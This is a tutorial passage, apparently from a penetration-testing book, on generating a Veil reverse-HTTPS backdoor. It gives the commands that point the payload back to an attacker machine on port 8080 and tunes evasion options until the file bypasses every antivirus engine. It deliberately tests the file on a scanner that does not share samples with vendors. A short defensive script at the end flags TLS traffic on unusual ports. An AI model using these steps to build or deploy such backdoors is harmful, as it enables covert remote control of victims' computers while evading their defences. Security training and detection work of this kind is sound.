Generating a Veil backdoor

We're now going to use Veil to generate a backdoor. First, we'll run the list command. Since we want to use Evasion, we'll type the use 1 command and press Enter, and, since we want to use the fifteenth payload, we'll then run the use 15 command, as follows:

Using the following options, we're going to change the payload's IP LHOST to the IP address of the Kali machine we're using.

To get the IP address of our Kali machine, we have to run ifconfig. Split the screen by right-clicking and selecting Split Horizontally, and then run the command. As shown in the following screenshot, the Kali machine's IP address is 10.0.2.15, which is where we want the target computer's connection to return to once the backdoor has been executed:

To set LHOST to 10.0.2.15, write the set command followed by the option you want to change and its new value, as follows:

set LHOST 10.0.2.15

We now need to change LPORT so that it's set to 8080. This port is also commonly used by web servers, so it will not appear suspicious and should still get through firewalls. To set the port, input the set LPORT 8080 command, as shown in the following screenshot:

In our experience, this process will bypass every antivirus program except AVG. Antivirus programs work using a large database of signatures. These signatures correspond to files that contain harmful code, so if our file matches any value in the database, it will be flagged as a virus or as malware. Because of this, we need to make sure that our backdoor is as unique as possible so that it can bypass every piece of antivirus software. Veil works hard at this by encrypting the backdoor, obfuscating it, and injecting it into memory so that it doesn't get detected, but this is not enough for AVG.

To ensure our backdoor can bypass AVG, we need to modify the PROCESSORS option, the minimum number of processors the backdoor expects on the machine it runs on; in this case, we set it to 1. To do this, use the following command:

set PROCESSORS 1

We will also modify the SLEEP option, which is the number of seconds the backdoor will wait before it executes the payload. To tell your backdoor to wait 6 seconds, use the following command:

set SLEEP 6

These changes are reflected in the following screenshot:

We are now going to generate the backdoor using the generate command, as shown in the following screenshot:

We now need to name our backdoor. Here, we're going to name it rev_https_8080. The following screenshot illustrates what we see once a backdoor has been generated; this includes the module used by the backdoor and where it's stored:

To test our backdoor, we're going to skip both Veil's checkvt command, which is not always accurate, and VirusTotal, which shares its results with antivirus vendors, and instead opt for the website NoDistribute, as shown in the following screenshot:

Now, click on Browse... and navigate to your file in /usr/share/veil-output/compiled, as shown in the following screenshot:

Once we have clicked Scan File (or View Previous Results), we can see that the file we uploaded has successfully bypassed all of the antivirus programs, as shown in the following screenshot:

The uploaded file bypassing the antivirus programs

Remember that Veil will work best when it's kept up to date with the latest version. It's also worth noting that whether a backdoor goes undetected or not is often arbitrary: one backdoor we previously generated with no sleep setting was detected by antivirus software, as was one with a sleep time of 10 seconds. A backdoor set with a sleep time of 6 seconds, however, bypassed every program.

We recommend playing around with all the available options within a payload to find something that works for you.
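From the defender's side, the port choice made above leaves a visible trace: the reverse HTTPS channel on port 8080 means TLS traffic shows up on a port where plain HTTP, not TLS, is expected. The following script is an added example, not part of the original text, that scans constructed connection-log lines (the log format and the `EXPECTED_TLS_PORTS` set are assumptions for this example) and flags TLS sessions on unusual ports.

```python
import re
from dataclasses import dataclass

# Constructed sample of firewall/proxy-style connection log lines (not real traffic).
# Format assumed for this example: "<ts> src=<ip>:<port> dst=<ip>:<port> proto=<proto>".
SAMPLE_LOG = """\
2024-01-01T10:00:00Z src=10.0.2.4:49152 dst=93.184.216.34:443 proto=tls
2024-01-01T10:00:06Z src=10.0.2.4:49153 dst=10.0.2.15:8080 proto=tls
2024-01-01T10:00:07Z src=10.0.2.4:49154 dst=10.0.2.5:8080 proto=http
2024-01-01T10:01:00Z src=10.0.2.4:49155 dst=10.0.2.15:8080 proto=tls
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) proto=(?P<proto>\w+)$"
)

# Ports where a TLS session is ordinarily expected (assumed set); anything else is worth a look.
EXPECTED_TLS_PORTS = {443, 8443}


@dataclass(frozen=True)
class Finding:
    ts: str
    src: str
    dst: str
    dport: int


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {**m.groupdict(), "sport": int(m["sport"]), "dport": int(m["dport"])}


def find_tls_on_unexpected_ports(log_text):
    """Return one Finding per TLS session whose destination port is not a usual TLS port."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "tls":
            continue  # unparsable line or non-TLS traffic; plain HTTP on 8080 is left alone
        if rec["dport"] not in EXPECTED_TLS_PORTS:
            findings.append(Finding(rec["ts"], rec["src"], rec["dst"], rec["dport"]))
    return findings


if __name__ == "__main__":
    for f in find_tls_on_unexpected_ports(SAMPLE_LOG):
        print(f"{f.ts} {f.src} -> {f.dst}:{f.dport} TLS on non-standard port")
```

On the sample above, the two TLS sessions to 10.0.2.15:8080 are reported while the plain HTTP request on 8080 and the normal HTTPS session on 443 are not.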
